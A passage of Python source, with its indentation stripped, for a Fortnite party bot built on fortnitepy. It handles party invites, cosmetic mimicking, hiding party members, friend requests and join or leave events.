send(self.user.display_name,l("declined_invite_whitelist2", f"{str(invitation.sender.display_name)} / {invitation.sender.id} [{platform_to_str(invitation.sender.platform)}]", invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
try:
await invitation.decline()
except fortnitepy.PartyError:
if data['ingame-error']:
await invitation.sender.send(l("error_netcl_does_not_match"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_netcl_does_not_match"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except fortnitepy.HTTPException:
if data['ingame-error']:
await invitation.sender.send(l("error_while_declining_invite"))
if data['loglevel'] == 'debug':
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(client.user.display_name,l("error_while_declining_invite"),red,add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
if data['ingame-error']:
await invitation.sender.send(l("error"))
send(client.user.display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def change_asset(self, author_id: str, type_: str, id_: str, variants: Optional[list] = None, enlightenment: Optional[Union[tuple, list]] = None) -> None:
if not enlightenment:
enlightenment = None
if type_ == "Outfit":
if self.outfitlock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants_ = self.party.me.create_variants(item="AthenaCharacter", profile_banner='ProfileBanner')
variants = variants_ + (variants or [])
await self.party.me.edit_and_keep(partial(self.party.me.set_outfit, asset=id_, variants=variants, enlightenment=enlightenment))
try:
if data['fortnite']['avatar_id'] == "{bot}":
self.set_avatar(fortnitepy.Avatar(asset=self.party.me.outfit, background_colors=data['fortnite']['avatar_color']))
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif type_ == "Back Bling":
if self.backpacklock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants_ = self.party.me.create_variants(item="AthenaBackpack", profile_banner='ProfileBanner')
variants += variants_
await self.party.me.edit_and_keep(partial(self.party.me.set_backpack, asset=id_, variants=variants, enlightenment=enlightenment))
elif type_ == "Pet":
if self.backpacklock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants_ = self.party.me.create_variants(item="AthenaBackpack", profile_banner='ProfileBanner')
variants += variants_
await self.party.me.edit_and_keep(partial(self.party.me.set_pet, asset=id_, variants=variants))
elif type_ == "Harvesting Tool":
if self.pickaxelock and self.lock_check(author_id):
return False
else:
if 'banner' in id_:
variants_ = self.party.me.create_variants(item="AthenaPickaxe", profile_banner='ProfileBanner')
variants += variants_
await self.party.me.edit_and_keep(partial(self.party.me.set_pickaxe, asset=id_, variants=variants))
await self.party.me.set_emote("EID_IceKing")
elif type_ == "Emote":
if self.emotelock and self.lock_check(author_id):
return False
else:
if member_asset(self.party.me, "emote") and member_asset(self.party.me, "emote").lower() == id_.lower():
await self.party.me.clear_emote()
if "holidaycracker" in id_.lower():
if id_ != '' and '.' not in id_:
id_ = ("AthenaDanceItemDefinition'/Game/Athena/Items/"
"Cosmetics/Dances/HolidayCracker/{0}.{0}'".format(id_))
await self.party.me.set_emote(asset=id_)
self.eid = id_
elif id_.lower().endswith("papayacomms"):
if id_ != '' and '.' not in id_:
id_ = ("AthenaDanceItemDefinition'/Game/Athena/Items/"
"Cosmetics/Dances/PapayaComms/{0}.{0}'".format(id_))
await self.party.me.set_emote(asset=id_)
self.eid = id_
else:
await self.party.me.set_emote(asset=id_)
self.eid = id_
elif type_ == "Emoticon":
if self.emotelock and self.lock_check(author_id):
return False
else:
if member_asset(self.party.me, "emote") and member_asset(self.party.me, "emote").lower() == id_.lower():
await self.party.me.clear_emote()
id_ = f"/Game/Athena/Items/Cosmetics/Dances/Emoji/{id_}.{id_}"
await self.party.me.set_emote(asset=id_)
self.eid = id_
elif type_ == "Toy":
if self.emotelock and self.lock_check(author_id):
return False
else:
if member_asset(self.party.me, "emote") and member_asset(self.party.me, "emote").lower() == id_.lower():
await self.party.me.clear_emote()
id_ = f"/Game/Athena/Items/Cosmetics/Toys/{id_}.{id_}"
await self.party.me.set_emote(asset=id_)
self.eid = id_
return True
async def disable_voice(self) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
prop = self.party.meta.set_voicechat_implementation('None')
await client.party.patch(updated=prop)
async def enable_voice(self) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
prop = self.party.meta.set_voicechat_implementation('VivoxVoiceChat')
await client.party.patch(updated=prop)
async def hide(self, member_id: Optional[str] = None) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
real_members = self.party.meta.squad_assignments
if not member_id:
num = 0
squad_assignments = [{"memberId": self.user.id, "absoluteMemberIdx": num}]
num += 1
if data['fortnite']['show-owner']:
for owner in self.owner:
if self.party.get_member(owner.id):
squad_assignments.append({"memberId": owner.id, "absoluteMemberIdx": num})
num += 1
if data['fortnite']['show-whitelist']:
for whitelistuser in whitelist:
if self.party.get_member(whitelistuser):
squad_assignments.append({"memberId": whitelistuser, "absoluteMemberIdx": num})
num += 1
if data['fortnite']['show-bot']:
for botuser in (otherbotlist + [i.user.id for i in loadedclients]):
if self.party.get_member(botuser):
squad_assignments.append({"memberId": botuser, "absoluteMemberIdx": num})
num += 1
else:
member = self.party.get_member(member_id)
if not member:
raise fortnitepy.NotFound("This member is not a part of this party.")
squad_assignments = self.visual_members
for squad in squad_assignments:
if squad["memberId"] == member.id:
squad_assignments.remove(squad)
self.visual_members = squad_assignments
prop = self.party.meta.set_squad_assignments(squad_assignments)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
async def show(self, member_id: Optional[str] = None) -> None:
if not self.party.me.leader:
raise fortnitepy.Forbidden("You must be the party leader to perform this action.")
real_members = self.party.meta.squad_assignments
if not member_id:
member_indexes = [member.position for member in self.party.members if isinstance(member.position,int)]
available_indexes = [num for num in range(15) if num not in member_indexes]
num = 0
squad_assignments = []
for member in self.party.members:
if isinstance(member.position,int):
squad_assignments.append(
{
"memberId": member.id,
"absoluteMemberIdx": member.position
}
)
else:
squad_assignments.append(
{
"memberId": member.id,
"absoluteMemberIdx": available_indexes[num]
}
)
num += 1
else:
squad_assignments = self.visual_members
squad_members = [member["memberId"] for member in squad_assignments]
member_indexes = [member["absoluteMemberIdx"] for member in squad_assignments]
available_indexes = [num for num in range(15) if num not in member_indexes]
member = self.party.get_member(member_id)
if not member:
raise fortnitepy.NotFound("This member is not a part of this party.")
if member.id not in squad_members:
squad_assignments.append({"memberId": member.id, "absoluteMemberIdx": available_indexes[0]})
self.visual_members = squad_assignments
prop = self.party.meta.set_squad_assignments(squad_assignments)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
async def party_member_outfit_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.outfitmimic,bool) and self.outfitmimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.outfitmimic,str) and member.id == self.outfitmimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"outfit"):
send(display_name_,f"CID: {member_asset(member,'outfit')}")
if flag:
if not member_asset(member,"outfit"):
try:
await self.change_asset(self.user.id, "Outfit", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
await self.change_asset(self.user.id, "Outfit", member_asset(member,"outfit"), member.outfit_variants, member.enlightenments)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def party_member_backpack_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.backpackmimic,bool) and self.backpackmimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.backpackmimic,str) and member.id == self.backpackmimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"backpack"):
send(display_name_,f"BID: {member_asset(member,'backpack')}")
if flag:
if not member_asset(member,"backpack"):
try:
await self.change_asset(self.user.id, "Back Bling", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
type_ = convert_to_type(member_asset(member,'backpack'))
await self.change_asset(self.user.id, type_, member_asset(member,"backpack"), member.backpack_variants, member.enlightenments)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def party_member_pickaxe_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.pickaxemimic,bool) and self.pickaxemimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.pickaxemimic,str) and member.id == self.pickaxemimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"pickaxe"):
send(display_name_,f"Pickaxe_ID: {member_asset(member,'pickaxe')}")
if flag:
if not member_asset(member,"pickaxe"):
try:
await self.change_asset(self.user.id, "Harvesting Tool", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
await self.change_asset(self.user.id, "Harvesting Tool", member_asset(member,"pickaxe"), member.pickaxe_variants)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def party_member_emote_change(self, member: fortnitepy.PartyMember) -> None:
display_name = name(self.user)
if member.id == self.user.id:
return
flag = False
if isinstance(self.emotemimic,bool) and self.emotemimic:
if (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['mimic-ignorebot']):
return
flag = True
elif isinstance(self.emotemimic,str) and member.id == self.emotemimic:
flag = True
display_name_ = self.is_most()
if display_name_ and member_asset(member,"emote"):
send(display_name_,f"EID: {member_asset(member,'emote')}")
if flag:
if not member_asset(member,"emote"):
try:
await self.change_asset(self.user.id, "Emote", "")
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
try:
type_ = convert_to_type(member_asset(member,"emote"))
await self.change_asset(self.user.id, type_, member_asset(member,"emote"))
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
#Events
async def event_device_auth_generate(self, details: dict, email: str) -> None:
store_device_auth_details(email, details)
async def event_ready(self) -> None:
global first_boot
loop = asyncio.get_event_loop()
self.boot_time = time.time()
self.booted_utc = datetime.datetime.utcnow()
display_name = name(self.user)
send(display_name,f'{l("login")}: {display_name}',green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
flag = False
if first_boot:
first_boot = False
flag = True
self.isready = True
self.booting = False
if not self.visual_members:
if self.party:
self.visual_members = self.party.meta.squad_assignments
else:
self.visual_members = [{"memberId": self.user.id, "absoluteMemberIdx": 0}]
loadedclients.append(self)
client_name[self.user.display_name] = self
self.add_cache(self.user)
for user in [list(self.friends) + list(self.pending_friends) + list(self.blocked_users)]:
self.add_cache(user)
loop.create_task(self.status_loop())
try:
if data['fortnite']['avatar_id'] == "{bot}":
self.set_avatar(fortnitepy.Avatar(asset=self.party.me.outfit, background_colors=data['fortnite']['avatar_color']))
else:
self.set_avatar(fortnitepy.Avatar(asset=data['fortnite']['avatar_id'].format(bot=self.party.me.outfit), background_colors=data['fortnite']['avatar_color']))
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
self.owner = []
for owner in data['fortnite']['owner']:
user = self.get_user(owner) or self.get_cache_user(owner)
if not user:
try:
user = await self.fetch_user(owner)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("owner_notfound",owner),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
friend = self.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_owner",commands["reload"]),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not self.is_pending(user.id):
try:
await self.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
else:
self.owner.append(friend)
send(display_name,f'{l("owner")}: {name(friend)}',green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
if self.owner and data['fortnite']['click_invite']:
for owner in self.owner:
await owner.send(l("click_invite"))
async def _(listuser: str) -> None:
user = self.get_user(listuser) or self.get_cache_user(listuser)
if not user:
try:
user = await self.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l("invitelist_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
friend = self.get_friend(user.id)
if not friend:
send(display_name,l("not_friend_with_inviteuser",listuser,commands["reload"]),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend'] and not self.is_pending(user.id) and user.id != self.user.id:
try:
await self.add_friend(user.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_sending_friendrequest"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.invitelist.append(friend.id)
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite']['invitelist']])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f'invitelist {self.invitelist}',yellow,add_d=lambda x:f'```\n{x}\n```')
if data['fortnite']['acceptfriend']:
async def _(pending: fortnitepy.IncomingPendingFriend) -> None:
if self.acceptfriend is True:
try:
await pending.accept()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif self.acceptfriend is False:
try:
await pending.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
try:
await asyncio.gather(*[_(pending) for pending in client.incoming_pending_friends])
except Exception:
data["discord"]["enabled"] = False
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if flag:
lists = {
"blacklist": "blacklist",
"whitelist": "whitelist",
"otherbotlist": "botlist"
}
async def _(listuser: str) -> None:
user = self.get_user(listuser) or self.get_cache_user(listuser)
if not user:
try:
user = await self.fetch_user(listuser)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{data_}_user_notfound",listuser),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
if data_ == "blacklist" and data["fortnite"]["blacklist-autoblock"]:
try:
await user.block()
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
globals()[list_].append(user.id)
for list_,data_ in lists.items():
try:
await asyncio.gather(*[_(listuser) for listuser in data['fortnite'][list_]])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['loglevel'] == "debug":
send(display_name,f"fortnite {data_}list {globals()[list_]}",yellow,add_d=lambda x:f'```\n{x}\n```')
lists = [
"outfitmimic",
"backpackmimic",
"pickaxemimic",
"emotemimic"
]
async def _(mimic: str) -> None:
if isinstance(data['fortnite'][mimic],str):
user = self.get_user(mimic) or self.get_cache_user(mimic)
if not user:
try:
user = await self.fetch_user(data['fortnite'][mimic])
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_requesting_userinfo"),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not user:
send(display_name,l(f"{mimic}_user_notfound",data['fortnite'][mimic]),red,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}',add_d=lambda x:f'>>> {x}')
else:
self.add_cache(user)
setattr(self,mimic,user.id)
if data['loglevel'] == "debug":
send(display_name,f"{mimic} {getattr(self,mimic)}",yellow,add_d=lambda x:f'```\n{x}\n```')
try:
await asyncio.gather(*[_(mimic) for mimic in lists])
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['discord']['enabled']:
try:
await dclient.start(data['discord']['token'])
except Exception:
data["discord"]["enabled"] = False
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_before_close(self) -> None:
self.isready = False
self.boot_time = None
send(name(self.user),f'{l("closing")}: {self.user.display_name}',green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_restart(self) -> None:
self.boot_time = time.time()
send(name(self.user),l("relogin", self.user.display_name),green,add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_party_invite(self, invitation: fortnitepy.ReceivedPartyInvitation) -> None:
if not self.isready or not invitation:
return
display_name = name(self.user)
self.add_cache(invitation.sender)
if invitation.sender.id in blacklist and data['fortnite']['blacklist-declineinvite']:
return
if invitation.sender.id in [owner.id for owner in self.owner]:
await self.invitation_accept(invitation)
return
if invitation.sender.id in whitelist and data['fortnite']['whitelist-allowinvite']:
await self.invitation_accept(invitation)
return
if data['loglevel'] == 'normal':
send(display_name,l("invite_from",name(invitation.sender)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(display_name,l("invite_from2",f'{name(invitation.sender)} [{platform_to_str(invitation.sender.platform)}]',invitation.party.id),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
for owner in self.owner:
if self.party.get_member(owner.id) and data['fortnite']['invite-ownerdecline']:
await self.invitation_decline_owner(invitation)
return
if True in [member.id in whitelist for member in self.party.members] and data['fortnite']['whitelist-declineinvite']:
await self.invitation_decline_whitelist(invitation)
elif not self.acceptinvite:
await self.invitation_decline(invitation)
elif not self.acceptinvite_interval:
await self.invitation_decline_interval(invitation)
else:
await self.invitation_accept(invitation)
async def event_friend_request(self, request: Union[fortnitepy.IncomingPendingFriend, fortnitepy.OutgoingPendingFriend]) -> None:
if not self.isready or not request:
return
display_name = name(self.user)
self.add_cache(request)
if request.outgoing:
send(display_name,l("friend_request_to",name(request)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
return
send(display_name,l("friend_request_from",name(request)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
if self.acceptfriend is True:
try:
await request.accept()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_accepting_friendrequest"),red,add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif self.acceptfriend is False:
try:
await request.decline()
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_declining_friendrequest"),red,add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("friend_request_decline",name(request)),red,add_d=lambda x:f'>>> {x}')
async def event_friend_add(self, friend: fortnitepy.Friend) -> None:
if not self.isready or not friend:
return
display_name = name(self.user)
self.add_cache(friend)
if friend.outgoing:
send(display_name,l("friend_accept",name(friend)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(display_name,l("friend_add",name(friend)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_friend_remove(self, friend: fortnitepy.Friend) -> None:
if not self.isready or not friend:
return
display_name = name(self.user)
self.add_cache(friend)
if data['loglevel'] == 'normal':
send(display_name,l("friend_remove",name(friend)),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
else:
send(display_name,l("friend_remove",f'{name(friend)} [{platform_to_str(friend.platform)}]'),add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
async def event_party_member_join(self, member: fortnitepy.PartyMember) -> None:
try:
if member.id == self.user.id:
self.visual_members = self.party.meta.squad_assignments
else:
self.visual_members.append({"memberId": member.id, "absoluteMemberIdx": member.position})
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
loop = asyncio.get_event_loop()
loop.create_task(self.change_status())
if self.party.me.leader and (data['fortnite']['hide-user'] or data['fortnite']['hide-blacklist']):
async def _() -> None:
nonlocal member
try:
await asyncio.sleep(0.5)
if data['fortnite']['hide-user']:
if (not member.id in [owner.id for owner in self.owner] and data['fortnite']['show-owner']
and not (member.id in whitelist and data['fortnite']['show-whitelist'])
and not (member.id in (otherbotlist + [i.user.id for i in loadedclients]) and data['fortnite']['show-bot'])
and member.id != self.user.id):
for squad in self.visual_members:
if squad["memberId"] == member.id:
self.visual_members.remove(squad)
elif data['fortnite']['hide-blacklist']:
if member.id in blacklist:
for squad in self.visual_members:
if squad["memberId"] == member.id:
self.visual_members.remove(squad)
real_members = self.party.meta.squad_assignments
prop = self.party.meta.set_squad_assignments(self.visual_members)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
await asyncio.sleep(2)
self.party.meta.set_squad_assignments(real_members)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
loop.create_task(_())
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l('party_member_joined',name(member),member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l('party_member_joined',f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',member.party.member_count),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if member.id in blacklist and self.party.me.leader:
if data['fortnite']['blacklist-autokick']:
try:
await member.kick()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
elif data['fortnite']['blacklist-autochatban']:
try:
await member.chatban()
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if data['fortnite']['addfriend']:
for member_ in member.party.members:
try:
if not self.has_friend(member_.id) and not self.is_pending(member_.id) and not self.is_blocked(member_.id) and member_.id != self.user.id:
await self.add_friend(member_.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if self.joinmessageenable:
var = defaultdict(lambda: None)
var.update(self.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"member_display_name": member.display_name,
"member_id": member.id,
"member": member
}
)
try:
mes = eval_format(data['fortnite']['joinmessage'],var)
await self.party.send(mes)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if self.randommessageenable:
var = defaultdict(lambda: None)
var.update(self.get_client_data())
var.update(
{
"get_client_data": get_client_data,
"all_friend_count": sum([len(client_.friends) for client_ in clients]),
"all_pending_count": sum([len(client_.pending_friends) for client_ in clients]),
"all_block_count": sum([len(client_.blocked_users) for client_ in clients]),
"member_display_name": member.display_name,
"member_id": member.id,
"member": member
}
)
try:
randommessage = random.choice(data['fortnite']['randommessage'])
mes = mes = eval_format(randommessage,var)
send(display_name,f'{l("random_message")}: {mes}',add_p=lambda x:f'[{now()}] [{self.user.display_name}] {x}')
await self.party.send(mes)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await asyncio.sleep(0.1)
if data["fortnite"]["joinemote"]:
try:
await self.change_asset(self.user.id, "Emote", self.eid)
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if self.party.leader.id == self.user.id:
try:
await self.party.set_playlist(data['fortnite']['playlist'])
await self.party.set_privacy(data['fortnite']['privacy'].value)
if data["fortnite"]["disable_voice"]:
await self.disable_voice()
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_leave(self, member: fortnitepy.PartyMember) -> None:
try:
if member.id == self.user.id:
self.visual_members = []
else:
for squad in self.visual_members:
if squad["memberId"] == member.id:
self.visual_members.remove(squad)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
if not self.isready or not member:
return
self.add_cache(member)
display_name = name(self.user)
display_name_ = self.is_most()
loop = asyncio.get_event_loop()
loop.create_task(self.change_status())
if self.party.me.leader and (data['fortnite']['hide-user'] or data['fortnite']['hide-blacklist']):
async def _() -> None:
nonlocal member
try:
await asyncio.sleep(0.5)
real_members = self.party.meta.squad_assignments
prop = self.party.meta.set_squad_assignments(self.visual_members)
await self.party.patch(updated=prop)
self.party.meta.set_squad_assignments(real_members)
await asyncio.sleep(2)
self.party.meta.set_squad_assignments(real_members)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
loop.create_task(_())
if display_name_:
if data['loglevel'] == 'normal':
send(display_name_,l("party_member_left",name(member),member.party.member_count),magenta,lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
else:
send(display_name_,l("party_member_left",f'{name(member)} [{platform_to_str(member.platform)}/{member.input}]',member.party.member_count),magenta,lambda x:f'[{now()}] [{l("party")}] [{display_name_}] {x}')
if data['fortnite']['addfriend']:
for member in member.party.members:
if not self.has_friend(member.id) and not self.is_pending(member.id) and not self.is_blocked(member.id) and member.id != self.user.id:
try:
await self.add_friend(member.id)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
continue
except Exception:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_confirm(self, confirmation: fortnitepy.PartyJoinConfirmation) -> None:
if not self.isready or not confirmation:
return
self.add_cache(confirmation.user)
display_name = name(self.user)
display_name_ = self.is_most()
if display_name_ and data['loglevel'] != 'normal':
send(display_name_,l("party_member_request",name(confirmation.user)),magenta,add_p=lambda x:f'[{now()}] [{l("party")}/{self.party.id}] [{display_name_}] {x}')
if data['fortnite']['blacklist-autokick'] and confirmation.user.id in blacklist:
try:
await confirmation.reject()
except fortnitepy.HTTPException:
if data['loglevel'] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_declining_partyrequest"),red,add_d=lambda x:f'>>> {x}')
else:
try:
await confirmation.confirm()
except fortnitepy.HTTPException:
if data['loglevel'] == "debug":
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
send(display_name,l("error_while_accepting_partyrequest"),red,add_d=lambda x:f'>>> {x}')
async def event_party_member_kick(self, member: fortnitepy.PartyMember) -> None:
try:
if member.id == self.user.id:
self.visual_members = []
else:
for squad in self.visual_members:
if squad["memberId"] == member.id:
self.visual_members.remove(squad)
except Exception:
if data['loglevel'] == 'debug':
send(name(self.user),traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
